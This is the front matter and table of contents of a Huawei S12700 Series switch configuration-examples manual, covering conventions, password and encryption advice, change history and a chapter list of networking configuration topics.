S12700 Typical Configuration Examples

S12700 Series Agile Switches
Typical Configuration Examples
Issue 10
Date 2016-10-30
HUAWEI TECHNOLOGIES CO., LTD.

Copyright © Huawei Technologies Co., Ltd. 2016. All rights reserved.
No part of this document may be reproduced or transmitted in any form or by any means without prior written
consent of Huawei Technologies Co., Ltd.
Trademarks and Permissions
and other Huawei trademarks are trademarks of Huawei Technologies Co., Ltd.
All other trademarks and trade names mentioned in this document are the property of their respective
holders.
Notice
The purchased products, services and features are stipulated by the contract made between Huawei and the
customer. All or part of the products, services and features described in this document may not be within the
purchase scope or the usage scope. Unless otherwise specified in the contract, all statements, information,
and recommendations in this document are provided "AS IS" without warranties, guarantees or
representations of any kind, either express or implied.
The information in this document is subject to change without notice. Every effort has been made in the
preparation of this document to ensure accuracy of the contents, but all statements, information, and
recommendations in this document do not constitute a warranty of any kind, express or implied.
Huawei Technologies Co., Ltd.

Address: Huawei Industrial Base
Bantian, Longgang
Shenzhen 518129
People's Republic of China
Website: http://e.huawei.com
Issue 10 (2016-10-30) Huawei Proprietary and Confidential i

Copyright © Huawei Technologies Co., Ltd.
Typical Configuration Examples About This Document
About This Document
This document provides the typical configuration examples supported by the device.
This document is intended for:
l Data configuration engineers
l Commissioning engineers
l Network monitoring engineers
l System maintenance engineers
Symbol Conventions
The symbols that may be found in this document are defined as follows.
Symbol Description
Indicates an imminently hazardous situation

which, if not avoided, will result in death or
serious injury.
Indicates a potentially hazardous situation

which, if not avoided, could result in death
or serious injury.

which, if not avoided, may result in minor
or moderate injury.

which, if not avoided, could result in
equipment damage, data loss, performance
deterioration, or unanticipated results.
NOTICE is used to address practices not
related to personal injury.
NOTE Calls attention to important information,

best practices and tips.
NOTE is used to address information not
related to personal injury, equipment
damage, and environment deterioration.
Issue 10 (2016-10-30) Huawei Proprietary and Confidential ii

Command Conventions
The command conventions that may be found in this document are defined as follows.
Convention Description
Boldface The keywords of a command line are in boldface.
Italic Command arguments are in italics.
[] Items (keywords or arguments) in brackets [ ] are optional.
{ x | y | ... } Optional items are grouped in braces and separated by

vertical bars. One item is selected.
[ x | y | ... ] Optional items are grouped in brackets and separated by

vertical bars. One item is selected or no item is selected.
{ x | y | ... }* Optional items are grouped in braces and separated by

vertical bars. A minimum of one item or a maximum of all
items can be selected.
[ x | y | ... ]* Optional items are grouped in brackets and separated by

vertical bars. Several items or no item can be selected.
&<1-n> The parameter before the & sign can be repeated 1 to n

times.
# A line starting with the # sign is comments.
Interface Numbering Conventions

Interface numbers used in this manual are examples. In device configuration, use the existing
interface numbers on devices.
Security Conventions
l Password setting
– To ensure device security, use ciphertext when configuring a password and change
the password periodically.
– The switch considers all passwords starting and ending with %^%#, %#%#, %@
%@ or @%@% as ciphertext and decrypts them. If you configure a plaintext
password that starts and ends with %^%#, %#%#, %@%@ or @%@%, the switch
decrypts it and records it into the configuration file (plaintext passwords are not
recorded for the sake of security). Therefore, do not set a password starting and
ending with %^%#, %#%#, %@%@ or @%@%.
– When you configure passwords in ciphertext, different features must use different
ciphertext passwords. For example, the ciphertext password set for the AAA feature
cannot be used for other features.
Issue 10 (2016-10-30) Huawei Proprietary and Confidential iii

l Encryption algorithms
The switch currently supports the 3DES, AES, RSA, SHA1, SHA2, and MD5 encryption
algorithms. 3DES, RSA, and AES are reversible, whereas SHA1, SHA2, and MD5 are
irreversible. Using the encryption algorithms DES , 3DES, RSA (RSA-1024 or lower),
MD5 (in digital signature scenarios and password encryption), or SHA1 (in digital
signature scenarios) is a security risk. If protocols allow, use more secure encryption
algorithms, such as AES, RSA (RSA-2048 or higher), SHA2, or HMAC-SHA2.
An irreversible encryption algorithm must be used for the administrator password. SHA2
is recommended for this purpose.
l Personal data
Some personal data may be obtained or used during operation and fault location of your
purchased products, services, or features. Set up privacy policies and take appropriate
measures to protect personal data based on regional privacy laws.
l Mirroring
The terms mirrored port, port mirroring, traffic mirroring, and mirroring in this
document are mentioned only to describe the product's function of communication error
or failure detection, and do not involve collection or processing of any personal
information or communication data of users.
Disclaimer
This document is designed as a reference for you to configure your devices. Its contents,
including web pages, command line input and output, are based on laboratory conditions. It
provides instructions for general scenarios, but does not cover all use cases of all product
models. The examples given may differ from your use case due to differences in software
versions, models, and configuration files. When configuring your advice, alter the
configuration depending on your use case.
The specifications provided in this document are tested in lab environment (for example, the
tested device has been installed with a certain type of boards or only one protocol is run on
the device). Results may differ from the listed specifications when you attempt to obtain the
maximum values with multiple functions enabled on the device.
Change History
Updates between document issues are cumulative. Therefore, the latest document issue
contains all updates made in previous issues.
Changes in Issue 10 (2016-10-30)

Mistakes in the document are corrected.

The documentation is modified according to updates in V200R010C00.

The following information is added:
Issue 10 (2016-10-30) Huawei Proprietary and Confidential iv

l 16.8 Example for Configuring MAC Address-prioritized Portal Authentication

l 10.6.5 Example for Configuring Guest Access Using Social Media Accounts
(GooglePlus, Facebook, or Twitter Accounts) (V200R007C20, V200R009C00 and
Later Versions)
The following information is modified:
l 10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic

VLAN Delivery
l 19 Typical Configuration for Interconnection Between Switches and IP Phones

Mistakes in the document are corrected.

l 2.6 Example for Configuring ACU2 and NGFW on Switches

l 6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device

Used as the Gateway)
l 6.3.3 Example for Configuring Interface-based VLAN Assignment (Aggregation
Device Used as the Gateway)
l 6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway Through a Layer 2
Switch
l 9.1.1 Example for Configuring Static Routes for Interworking Between Different
Network Segments
l 17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting
l 17.12 Example for Configuring a Traffic Policy to Limit Access Between Network
Segments
l 8.1.2 Example for Configuring a Device as the DHCP Server (Based on the Global
Address Pool)
l 8.1.3 Example for Configuring a DHCP Server to Allocate Different Network
Parameters from the Global Address Pool to Dynamic and Static Clients
l 8.1.6 Example for Configuring a DHCP Client
l 8.1.7 Example for Configuring DHCP Servers Based on the Global Address Pool on
the Same Network Segment in VRRP Networking
l 9.1.1 Example for Configuring Static Routes for Interworking Between Different
Network Segments
l 9.1.2 Example for Configuring Static Routes for Load Balancing
l 9.1.3 Example for Configuring Static Routes for Link Backup
l 9.3.1 Example for Configuring Traffic Policies to Implement Policy-based Routing
(Redirection to Different Next Hops)
Issue 10 (2016-10-30) Huawei Proprietary and Confidential v

The following information is modified:

l 18.1.1 Example for Configuring a Device to Communicate with the NMS Using
SNMPv1
SNMPv2c
SNMPv3

l 22 Typical NGFW Module Configuration
l 10.1.4 Example for Configuring Authentication for Telnet Login Users (Using the
Secure ACS as a RADIUS Authentication Server)
l 2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus
or Branch Networks
l 2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are
Connected to Core Switches in In-line Mode)
l 2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are
Connected to Core Switches in Bypass Mode)
l 2.4 Example for Configuring an Agile Campus Network
l 17.11 Example for Limiting Access Based on the Flow ID



Initial commercial release.
Issue 10 (2016-10-30) Huawei Proprietary and Confidential vi

Typical Configuration Examples Contents
Contents
About This Document.....................................................................................................................ii

1 Use the Quick Search Tool.......................................................................................................... 1
2 Comprehensive configuration example.................................................................................... 2
2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus or Branch Networks...................... 3
2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in In-line
Mode)..................................................................................................................................................................................25
2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in Bypass
Mode)..................................................................................................................................................................................53
2.4 Example for Configuring an Agile Campus Network.................................................................................................. 81
2.4.1 Solution Overview..................................................................................................................................................... 81
2.4.2 Networking Requirements......................................................................................................................................... 81
2.4.3 Network Planning...................................................................................................................................................... 83
2.4.4 Feature Planning........................................................................................................................................................ 85
2.4.5 Data Planning............................................................................................................................................................ 88
2.4.6 Configuration Procedure............................................................................................................................................91
2.4.7 Summary and Recommendations............................................................................................................................ 101
2.5 Example for Configuring High-Speed Self Recovery on a Subway Bearer Network................................................102
2.5.1 Service Requirements and Solution Description..................................................................................................... 102
2.5.2 Basic Configuration................................................................................................................................................. 106
2.5.2.1 Data Plan...............................................................................................................................................................106
2.5.2.2 Configuring Device Information.......................................................................................................................... 110
2.5.2.3 Configuring Interfaces.......................................................................................................................................... 111
2.5.2.4 Enabling BFD....................................................................................................................................................... 113
2.5.3 Deploying OSPF...................................................................................................................................................... 114
2.5.3.1 Configuration Roadmap........................................................................................................................................114
2.5.3.2 Deploying OSPF................................................................................................................................................... 114
2.5.4 Deploying MPLS LDP.............................................................................................................................................117
2.5.4.1 Configuration Roadmap........................................................................................................................................117
2.5.4.2 Data Plan...............................................................................................................................................................117
2.5.4.3 Enabling MPLS LDP............................................................................................................................................ 118
2.5.4.4 Configuring Synchronization Between LDP and OSPF.......................................................................................120
2.5.4.5 Configuring LDP GR............................................................................................................................................120
2.5.4.6 Configuring BFD for LSP.................................................................................................................................... 121
Issue 10 (2016-10-30) Huawei Proprietary and Confidential vii

2.5.5 Deploying MPLS TE............................................................................................................................................... 122

2.5.5.1 Configuration Roadmap....................................................................................................................................... 122
2.5.5.2 Data Plan...............................................................................................................................................................123
2.5.5.3 Configuring MPLS TE Tunnels and Hot Standby................................................................................................126
2.5.5.4 Configuring RSVP GR......................................................................................................................................... 130
2.5.5.5 Configuring BFD for CR-LSP..............................................................................................................................131
2.5.6 Deploying L3VPN Services and Protection (HoVPN)............................................................................................133
2.5.6.1 Configuration Roadmap....................................................................................................................................... 133
2.5.6.2 Data Plan...............................................................................................................................................................135
2.5.6.3 Configuring MP-BGP...........................................................................................................................................138
2.5.6.4 Configuring an L3VPN........................................................................................................................................ 141
2.5.6.5 Configuring Reliability Protection....................................................................................................................... 143
2.5.7 Configuration Files.................................................................................................................................................. 148
2.5.7.1 Core_SPE1 Configuration File............................................................................................................................. 148
2.5.7.4 Site1_UPE1 Configuration File............................................................................................................................166
2.6 Example for Configuring ACU2 and NGFW on Switches........................................................................................ 187
3 Typical Login Configuration...................................................................................................201

3.1 Example for Configuring Switch Login Through a Console Port..............................................................................202
3.2 Example for Configuring Telnet Login (Based on ACL Rules and RADIUS Authentication)................................. 207
3.3 Example for Configuring STelnet Login (Based on RADIUS Authentication)......................................................... 211
3.4 Example for Configuring Switch Login Through the Web System........................................................................... 215
3.4.1 Factory Settings of Web Page Files for S Series Switches...................................................................................... 215
3.4.2 Example for Configuring Switch Login Through the Web System (V200R005)................................................... 216
3.4.3 Example for Configuring Switch Login Through the Web System........................................................................ 221
4 Typical File Management Configuration............................................................................. 225

4.1 Example for Logging In to the Device to Manage Files............................................................................................ 226
4.2 Example for Managing Files Using FTP.................................................................................................................... 227
4.3 Example for Managing Files Using SFTP..................................................................................................................230
4.4 Example for Accessing Files on Other Devices Using TFTP.................................................................................... 233
4.5 Example for Accessing Files on Other Devices Using FTP.......................................................................................235
4.6 Example for Accessing Files on Other Devices Using SFTP.................................................................................... 237
5 Typical Ethernet Interface Configuration.............................................................................249

5.1 Example for Configuring a Combo Interface............................................................................................................. 250
5.2 Example for Configuring the Rate and Duplex Mode of an Ethernet Interface.........................................................252
Issue 10 (2016-10-30) Huawei Proprietary and Confidential viii

5.3 Example for Switching an Interface Between Layer 2 and Layer 3 Modes...............................................................257
5.4 Example for Configuring Port Isolation..................................................................................................................... 259
6 Typical Ethernet Switching Configuration.......................................................................... 263

6.1 Typical MAC Configuration.......................................................................................................................................264
6.1.1 Example for Configuring MAC Address Limiting in a VLAN...............................................................................264
6.1.2 Example for Configuring MAC Address Limiting on an Interface.........................................................................266
6.2 Link Aggregation Configuration................................................................................................................................ 268
6.2.1 Example for Configuring Link Aggregation in Manual Mode When Switches Are Directly Connected.............. 268
6.2.2 Example for Configuring Link Aggregation in LACP Mode When Switches Are Directly Connected................ 271
6.2.3 Example for Connecting an E-Trunk to a VPLS Network...................................................................................... 274
6.2.4 Example for Configuring an Eth-Trunk Interface to Preferentially Forward Local Traffic....................................286
6.2.5 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status.......................291
6.3 Typical VLAN Configuration.....................................................................................................................................302
6.3.1 Example for Configuring Interface-based VLAN Assignment............................................................................... 302
6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device Used as the Gateway)................. 309
6.3.3 Example for Configuring Interface-based VLAN Assignment (Aggregation Device Used as the Gateway)........ 313
6.3.4 Example for Configuring MAC Address-based VLAN Assignment...................................................................... 317
6.3.5 Example for Configuring IP Subnet-based VLAN Assignment............................................................................. 323
6.3.6 Example for Directly Connecting a Terminal to a Layer 3 Gateway to Implement Inter-VLAN Communication
.......................................................................................................................................................................................... 330
6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway Through a Layer 2 Switch......................................... 332
6.3.8 Example for Configuring Communication Between Different Network Segments Through Static Routes........... 336
6.3.9 Example for Configuring the Super-VLAN............................................................................................................ 341
6.3.10 Example for Configuring MUX VLAN to Isolate Users in the Same VLAN.......................................................345
6.4 Typical QinQ Configuration....................................................................................................................................... 350
6.4.1 Example for Configuring Basic QinQ..................................................................................................................... 350
6.4.2 Example for Configuring VLAN ID-based Selective QinQ....................................................................................353
6.4.3 Example for Configuring Flow-based Selective QinQ............................................................................................356
6.5 Typical Loopback Detection Configuration............................................................................................................... 360
6.5.1 Example for Configuring LDT to Detect Loops on the Downstream Network...................................................... 360
6.5.2 Example for Configuring LDT to Detect Loops on the Local Network..................................................................364
6.5.3 Example for Configuring LBDT to Detect Loopbacks on an Interface.................................................................. 369
6.5.4 Example for Configuring LBDT to Detect Loops on the Downstream Network....................................................373
6.5.5 Example for Configuring LBDT to Detect Loops on the Local Network...............................................................376
7 Typical Examples of MSTP/RRPP/SEP/VBST..................................................................... 381

7.1 Example for Configuring STP.................................................................................................................................... 382
7.2 Example for Configuring RSTP................................................................................................................................. 386
7.3 Example for Configuring MSTP................................................................................................................................ 391
7.4 Example for Configuring MSTP and VRRP.............................................................................................................. 400
7.5 Example for Configuring a Single RRPP Ring with a Single Instance...................................................................... 411
7.6 Example for Configuring Tangent RRPP Rings.........................................................................................................416
7.7 Example for Configuring RRPP Snooping on a VPLS Network............................................................................... 424
Issue 10 (2016-10-30) Huawei Proprietary and Confidential ix

7.8 Example for Configuring SEP and MSTP on a Network........................................................................................... 431

7.9 Example for Configuring SEP and RRPP on a Network............................................................................................440
7.10 Example for Configuring VBST...............................................................................................................................452
8 Typical IP Service Configuration........................................................................................... 463

8.1 Typical DHCP Configuration..................................................................................................................................... 464
8.1.1 Example for Configuring the Device as a DHCP Server (Based on the Interface Address Pool).......................... 464
8.1.2 Example for Configuring a Device as the DHCP Server (Based on the Global Address Pool)..............................468
8.1.3 Example for Configuring a DHCP Server to Allocate Different Network Parameters from the Global Address Pool
to Dynamic and Static Clients.......................................................................................................................................... 472
8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same Network)................................................... 475
8.1.5 Example for Configuring the Device as a DHCP Relay (Across a GRE Tunnel)...................................................480
8.1.6 Example for Configuring a DHCP Client................................................................................................................488
8.1.7 Example for Configuring DHCP Servers Based on the Global Address Pool on the Same Network Segment in
VRRP Networking............................................................................................................................................................492
9 Typical Routing Configuration.............................................................................................. 499

9.1 Typical Static Route Configuration............................................................................................................................ 500
9.1.1 Example for Configuring Static Routes for Interworking Between Different Network Segments......................... 500
9.1.2 Example for Configuring Static Routes for Load Balancing...................................................................................504
9.1.3 Example for Configuring Static Routes for Link Backup....................................................................................... 509
9.1.4 Example for Configuring NQA for IPv4 Static Routes...........................................................................................514
9.1.5 Example for Configuring EFM for IPv4 Static Routes........................................................................................... 523
9.2 Typical OSPF Configuration...................................................................................................................................... 527
9.2.1 Example for Configuring Basic OSPF Functions....................................................................................................527
9.2.2 Example for Configuring an OSPF Stub Area........................................................................................................ 532
9.2.3 Example for Configuring an OSPF NSSA.............................................................................................................. 537
9.2.4 Example for Configuring OSPF Load Balancing....................................................................................................542
9.2.5 Example for Configuring BFD for OSPF................................................................................................................548
9.3 Typical PBR Configuration........................................................................................................................................ 554
9.3.1 Example for Configuring Traffic Policies to Implement Policy-based Routing (Redirection to Different Next
Hops)................................................................................................................................................................................ 554
10 Typical User Access and Authentication Configuration................................................. 561

10.1 Typical AAA Configuration..................................................................................................................................... 562
10.1.1 Notice to Be Taken When the Device Connects to Non-Huawei RADIUS Servers............................................. 562
10.1.2 Example for Configuring Authentication for Telnet Login Users (AAA Local Authentication)..........................563
10.1.3 Example for Configuring Authentication for Telnet Login Users (RADIUS Authentication)............................. 565
10.1.4 Example for Configuring Authentication for Telnet Login Users (Using the Secure ACS as a RADIUS
Authentication Server)......................................................................................................................................................569
10.1.5 Example for Configuring Authentication for Telnet Login Users (HWTACACS and Local Authentication)..... 589
10.1.6 Example for Configuring Default Domain-based User Management................................................................... 592
10.2 Typical NAC Configuration (Common Mode).........................................................................................................598
10.2.1 Example for Configuring 802.1x Authentication to Control Internal User Access.............................................. 598
10.2.2 Example for Configuring MAC Address Authentication to Control Internal User Access.................................. 602
Issue 10 (2016-10-30) Huawei Proprietary and Confidential x

10.2.3 Example for Configuring Portal Authentication to Control Internal User Access................................................606
10.3 Typical NAC Configuration (Unified Mode) (V200R007C00 and Earlier Versions, V200R008C00)....................610
10.3.1 Example for Configuring 802.1x Authentication to Control Internal User Access...............................................611
10.3.4 Example for Configuring Multiple Authentication Modes to Control Internal User Access................................623
10.4 Typical NAC Configuration (Unified Mode) (V200R007C20, V200R009C00 and Later Versions)...................... 627
10.4.1 Example for Configuring 802.1x Authentication to Control Internal User Access.............................................. 627
10.5 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C00
and Earlier Versions, V200R008C00).............................................................................................................................. 641
10.5.1 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network
(Authentication Point on Core Switch)............................................................................................................................ 642
(Authentication Point on Aggregation Switch) (V200R007C00 and Earlier Versions, V200R008C00).........................662
10.5.3 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the
Enterprise Network (Authentication Point on Access Switch).........................................................................................680
Enterprise Network (Authentication Point on Aggregation Switch)................................................................................696
10.6 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C20,
V200R009C00 and Later Versions)..................................................................................................................................714
(Authentication Point on Core Switch)............................................................................................................................ 714
(Authentication Point on Aggregation Switch) (V200R007C20, V200R009C00 and Later Versions)........................... 734
Enterprise Network (Authentication Point on Aggregation Switch)................................................................................753
10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic VLAN Delivery............................... 771
10.6.5 Example for Configuring Guest Access Using Social Media Accounts (GooglePlus, Facebook, or Twitter
Accounts) (V200R007C20, V200R009C00 and Later Versions).....................................................................................785
11 Typical Reliability Configuration........................................................................................798

11.1 Typical VRRP Configuration....................................................................................................................................799
11.1.1 Example for Configuring a VRRP Group in Active/Standby Mode..................................................................... 799
11.1.2 Example for Configuring a VRRP Group in Load Balancing Mode.....................................................................806
11.1.3 Example for Configuring Association Between VRRP and BFD to Implement a Rapid Active/Standby
Switchover........................................................................................................................................................................ 812
11.1.4 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status..................... 818
11.1.5 Example for Configuring VRRP to Ensure Reliable Multicast Data Transmission..............................................829
11.2 Typical BFD Configuration...................................................................................................................................... 844
11.2.1 Example for Associating the BFD Session Status with the Interface Status......................................................... 844
12 Typical Security Configuration............................................................................................ 850

12.1 Typical ACL Configuration......................................................................................................................................851
12.1.1 Example for Using an ACL to Restrict FTP Access Rights..................................................................................851
Issue 10 (2016-10-30) Huawei Proprietary and Confidential xi

12.1.2 Example for Using ACLs to Control Access to the Specified Server in the Specified Time Range.................... 853
12.1.3 Example for Using an ACL to Block Network Access of the Specified Users.....................................................859
12.1.4 Example for Using Reflective ACL to Implement Unidirectional Access Control.............................................. 862
12.1.5 Example for Allowing Certain Users to Access the Internet in the Specified Time Range.................................. 864
12.1.6 Example for Using ACLs to Restrict Mutual Access Between Network Segments............................................. 868
12.1.7 Example for Using an ACL to Prevent Internal Hosts from Accessing the Internet.............................................872
12.1.8 Example for Using an ACL to Prevent External Hosts from Accessing Internal Servers.................................... 875
12.1.9 Example for Applying ACLs to SNMP to Filter NMSs........................................................................................880
12.2 Example for Configuring Port Security....................................................................................................................882
13 Typical CSS Configuration of Modular Switches............................................................ 885

13.1 Example for Setting Up a CSS................................................................................................................................. 886
14 Typical MPLS&VPN Configuration....................................................................................896

14.1 Typical BGP/MPLS IP VPN Configuration............................................................................................................. 897
14.1.1 Example for Configuring BGP/MPLS IP VPN..................................................................................................... 897
14.1.2 Example for Configuring an MCE........................................................................................................................ 910
14.1.3 Example for Configuring Multicast VPN Access Through MCE Devices........................................................... 923
14.1.4 Example for Configuring L3VPN and VRRP....................................................................................................... 945
14.1.5 Example for Configuring Routing Policies to Control Mutual Access Between L3VPN Users.......................... 958
14.2 Example for Connecting QinQ Termination Sub-interfaces to a VLL Network......................................................966
14.3 Example for Deploying BGP/MPLS IP VPN and VPLS on One ISP Network.......................................................977
15 Typical WLAN-AC Configuration (Applicable to Versions V200R005 to V200R008)

.......................................................................................................................................................... 995
15.1 Common Misconfigurations..................................................................................................................................... 996
15.1.1 Multicast Packet Suppression Is Not Configured, and A Large Number of Low-Rate Multicast Packets Affect the
Wireless Network............................................................................................................................................................. 996
15.2 Example for Configuring WLAN Services on a Small-Scale Network................................................................... 997
15.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks......................... 1006
15.4 Example for Configuring Unified Access for Wired and Wireless Users.............................................................. 1016
15.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal
Authentication)............................................................................................................................................................... 1035
15.6 Example for Configuring MAC Address Authentication on the Wireless Side..................................................... 1055
15.7 Example for Configuring Portal Authentication on the Wireless Side...................................................................1064
15.8 Configuring Radio Calibration............................................................................................................................... 1075
15.8.1 Example for Configuring Radio Calibration....................................................................................................... 1075
15.8.2 Example for Configuring Session-based Static Load Balancing.........................................................................1085
15.8.3 Example for Configuring Traffic-based Dynamic Load Balancing.................................................................... 1094
15.9 Configuring WLAN Roaming................................................................................................................................ 1104
15.9.1 Example for Configuring Non-Fast Roaming Between APs in the Same Service VLAN..................................1104
15.9.2 Example for Configuring Fast Roaming Between APs in the Same Service VLAN.......................................... 1113
15.9.3 Example for Configuring Non-Fast Roaming Between APs in Different Service VLANs................................ 1124
15.9.4 Example for Configuring Fast Roaming Between APs in Different Service VLANs.........................................1134
15.10 Example for Configuring the WLAN Service Using WDS Technology..............................................................1146
Issue 10 (2016-10-30) Huawei Proprietary and Confidential xii

15.11 Example for Configuring the WLAN Service Using Mesh Technology.............................................................. 1159
16 Typical WLAN-AC Configuration (Applicable to Versions V200R009).................... 1171

16.1 Common Misconfigurations................................................................................................................................... 1172
16.1.1 Multicast Packet Suppression Is Not Configured, and A Large Number of Low-Rate Multicast Packets Affect the
Wireless Network............................................................................................................................................................1172
16.2 Example for Configuring WLAN Services on a Small-Scale Network................................................................. 1173
16.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks..........................1181
16.4 Example for Configuring Unified Access for Wired and Wireless Users.............................................................. 1190
16.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal
Authentication)............................................................................................................................................................... 1210
16.6 Example for Configuring MAC Address Authentication on the Wireless Side..................................................... 1231
16.7 Example for Configuring Portal Authentication on the Wireless Side...................................................................1240
16.8 Example for Configuring MAC Address-prioritized Portal Authentication.......................................................... 1255
16.9 Configuring Radio Calibration............................................................................................................................... 1266
16.9.1 Example for Configuring Radio Calibration....................................................................................................... 1266
16.9.2 Example for Configuring Static Load Balancing................................................................................................ 1276
16.9.3 Example for Configuring Dynamic Load Balancing...........................................................................................1286
16.10 Configuring WLAN Roaming.............................................................................................................................. 1296
16.10.1 Example for Configuring Intra-AC Roaming....................................................................................................1296
16.11 Example for Configuring the WLAN Service Using WDS Technology..............................................................1305
16.12 Example for Configuring the WLAN Service Using Mesh Technology..............................................................1319
17 Typical QoS Configuration................................................................................................. 1329

17.1 Example for Configuring Priority Re-marking and Queue Scheduling................................................................. 1330
17.2 Example for Configuring Interface-based Rate Limiting.......................................................................................1334
17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting................................................................ 1337
17.4 Example for Configuring Rate Limiting in a Specified Time Range..................................................................... 1342
17.5 Example for Configuring Rate Limiting Based on VLAN IDs..............................................................................1345
17.6 Example for Configuring Traffic Shaping..............................................................................................................1350
17.7 Example for Configuring Congestion Avoidance and Congestion Management...................................................1354
17.8 Example for Configuring a Traffic Policy to Prevent Some Users from Accessing the Internet at the Specified Time
........................................................................................................................................................................................ 1359
17.9 Example for Configuring a Traffic Policy to Collect Statistics on Ping Packets................................................... 1364
17.10 Example for Configuring a Traffic Policy to Implement Traffic Statistics.......................................................... 1370
17.11 Example for Limiting Access Based on the Flow ID........................................................................................... 1375
17.12 Example for Configuring a Traffic Policy to Limit Access Between Network Segments................................... 1385
17.13 Example for Configuring HQoS...........................................................................................................................1390
18 Typical Network Management and Monitoring Configuration.................................. 1402

18.1 Typical SNMP Configuration................................................................................................................................. 1403
18.1.1 Example for Configuring a Device to Communicate with the NMS Using SNMPv1........................................ 1403
18.1.2 Example for Configuring a Device to Communicate with the NMS Using SNMPv2c...................................... 1405
18.1.3 Example for Configuring a Device to Communicate with the NMS Using SNMPv3........................................ 1408
18.1.4 Example for Configuring eSight and Switches to Communicate Through SNMPv2c........................................1411
Issue 10 (2016-10-30) Huawei Proprietary and Confidential xiii

18.2 Typical NetStream Configuration...........................................................................................................................1418

18.2.1 Example for Configuring Original Flow Statistics Exporting.............................................................................1418
18.2.2 Example for Configuring Aggregation Flow Statistics Exporting...................................................................... 1423
18.2.3 Example for Configuring Flexible Flow Statistics Exporting............................................................................. 1426
18.3 Typical Mirroring Configuration............................................................................................................................ 1431
18.3.1 Example for Configuring Local Port Mirroring (1:1 Mirroring).........................................................................1431
18.3.2 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured One by
One)................................................................................................................................................................................ 1433
18.3.3 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured in a
Batch)..............................................................................................................................................................................1437
18.3.4 Example for Configuring Local Port Mirroring (N:1 Mirroring)........................................................................1440
18.3.5 Example for Configuring Local Port Mirroring (M:N Mirroring)...................................................................... 1443
18.3.6 Example for Configuring Layer 2 Remote Port Mirroring..................................................................................1446
18.3.7 Example for Configuring MQC-based Local Traffic Mirroring......................................................................... 1449
18.3.8 Example for Configuring ACL-based Local Traffic Mirroring...........................................................................1453
18.3.9 Example for Configuring MQC-based Remote Traffic Mirroring...................................................................... 1456
18.3.10 Example for Configuring ACL-based Remote Traffic Mirroring..................................................................... 1460
18.4 Typical iPCA Configuration................................................................................................................................... 1465
18.4.1 Example for Configuring iPCA to Implement End-to-End Packet Loss Measurement......................................1465
18.4.2 Example for Configuring iPCA to Implement Regional Network Packet Loss Measurement........................... 1469
18.4.3 Example for Configuring iPCA to Implement Hop-by-Hop Packet Loss Measurement.................................... 1475
18.4.4 Example for Configuring iPCA to Implement Packet Loss Measurement on a Direct Link.............................. 1480
18.4.5 Example for Configuring iPCA to Implement Packet Loss Measurement on a Device..................................... 1483
19 Typical Configuration for Interconnection Between Switches and IP Phones.........1486

19.1 Basic Concepts....................................................................................................................................................... 1488
19.2 IP Phone Deployment............................................................................................................................................. 1489
19.3 Typical Configuration Methods for Interconnection Between Switches and IP Phones........................................1490
19.4 Example for Connecting IP Phones to Switches Through LLDP.......................................................................... 1491
19.5 Example for Connecting IP Phones to Switches Through the MED TLV............................................................. 1502
19.6 Example for Connecting Cisco IP Phones to Switches Using HDP.......................................................................1510
19.7 Example for Connecting an IP Phone to a Switch Through the DHCP Server......................................................1521
19.8 Example for Connecting IP Phones to Switches Through MAC Address-based Assignment...............................1524
19.9 Example for Connecting IP Phones to Switches Through the OUI-based voice VLAN....................................... 1528
19.10 Example for Connecting IP Phones to Switches Through the PVID of the Voice VLAN ID..............................1541
19.11 Example for Connecting IP Phones to Switches Through an ACL......................................................................1552
19.12 Example for Connecting IP Phones to Switches Through a Simplified ACL......................................................1564
19.13 Example for Connecting IP Phones to Switches Through NAC Authentication and Voice VLAN.................... 1577
20 Typical Free Mobility and Service Chaining Configuration........................................ 1582

20.1 Example for Configuring a Service Chain to Guide Data Flow Forwarding......................................................... 1583
20.2 Example for Deploying the Free Mobility Function for Users' Physical Location Change(V200R006C00,
V200R007C00, V200R008C00).................................................................................................................................... 1594
20.3 Example for Deploying the Free Mobility Function for Users' Physical Location Change (V200R007C20,
andV200R009C00)......................................................................................................................................................... 1611
Issue 10 (2016-10-30) Huawei Proprietary and Confidential xiv

21 Typical SVF Configuration .................................................................................................1629

21.1 Information to Know Before You Deploy an SVF System.................................................................................... 1630
21.1.1 SVF Technical Characteristics.............................................................................................................................1630
21.1.2 SVF Application Scenarios................................................................................................................................. 1631
21.1.3 SVF Service Deployment Limitations.................................................................................................................1635
21.2 SVF System Planning............................................................................................................................................. 1637
21.2.1 Planning SVF System Networking......................................................................................................................1637
21.2.2 Planning Member Devices of an SVF System.................................................................................................... 1641
21.3 AS Service Configuration.......................................................................................................................................1643
21.3.1 Access User Network Partitioning Configuration............................................................................................... 1645
21.3.2 Access User Authentication Configuration......................................................................................................... 1645
21.3.3 Security Configuration........................................................................................................................................ 1651
21.4 Example for Configuring SVF............................................................................................................................... 1654
21.5 Example for Configuring the Access Layer for a Wired Campus Network Using eSight..................................... 1668
22 Typical NGFW Module Configuration............................................................................. 1679

